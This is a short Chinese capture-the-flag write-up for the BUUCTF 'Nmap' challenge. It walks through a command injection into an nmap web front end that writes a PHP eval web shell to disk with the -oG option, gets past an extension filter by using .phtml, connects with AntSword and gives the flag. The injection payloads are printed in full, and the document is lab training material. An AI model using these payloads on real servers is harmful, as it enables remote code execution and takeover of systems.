BUUCTF——Nmap

BUUCTF------Nmap

进入靶场

类似于一个nmap的网站

尝试一下功能

没什么用

看看数据包 既然跟IP相关

伪造一个XXF看看

拼接了一下没什么用 果然没这么简单

尝试一下命令注入

构造payload 127.0.0.1 | ls

应该有过滤 加了个\

直接构造个php木马上传试试

复制代码
127.0.0.1 | ' <?php @eval($_POST["cmd"]);?> -oG shell.php '

应该被过滤了

也没有什么提示 盲猜是后缀名 mini绕过试试

双写、php3都试过了 最后phtml成功了

复制代码
127.0.0.1 | ' <?= @eval($_POST["cmd"]);?> -oG shell.phtml '

拼接访问一下成功上传

用蚁剑连接看看

成功连接

接下来就慢慢找flag

在根目录下找到flag

复制代码
flag{aade295d-204f-476f-91ee-299a5fa993a2}

下播!!!!!

相关推荐
BachelorSC2 分钟前
【网络工程师软考版】路由协议 + ACL
网络
xian_wwq12 分钟前
【转】大模型安全治理的现状与展望
安全·ai
ZLlllllll020 分钟前
Corrosion2靶机攻略
安全·corrosion2
伤心男孩拯救世界(Code King)38 分钟前
Linux网络:多路转接 epoll
linux·运维·网络
lisanmengmeng1 小时前
正向代理与反向代理
运维·服务器·网络
雪兽软件1 小时前
2025网络安全指南
安全·web安全
轻抚酸~2 小时前
小迪23-28~31-js简单回顾
javascript·web安全
羊锦磊6 小时前
[ java 网络 ] TPC与UDP协议
java·网络·网络协议
cpsvps10 小时前
文件系统完整性校验工具在美服安全审计中的关键作用与实施步骤
服务器·网络·架构
♤SF♤10 小时前
SSL 剥离漏洞
网络·安全·https